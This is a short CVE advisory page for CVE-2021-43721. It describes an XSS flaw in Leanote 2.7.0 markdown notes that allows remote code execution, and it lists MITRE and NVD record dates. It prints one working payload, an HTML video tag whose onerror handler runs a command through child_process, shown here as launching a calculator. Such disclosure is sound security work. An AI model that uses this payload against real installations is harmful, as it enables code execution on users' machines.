Leanote 2.7.0 is vulnerable to Cross Site Scripting (XSS) in the markdown type note. This leads to remote code execution with payload : <video src=x onerror=(function(){require('child_process').exec('calc');})();>
History

No history.

cve-icon MITRE

Status: PUBLISHED

Assigner: mitre

Published: 2022-03-28T13:37:04

Updated: 2024-08-04T04:03:08.529Z

Reserved: 2021-11-15T00:00:00

Link: CVE-2021-43721

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Analyzed

Published: 2022-03-28T14:15:07.627

Modified: 2022-03-31T16:38:45.187

Link: CVE-2021-43721

cve-icon Redhat

No data.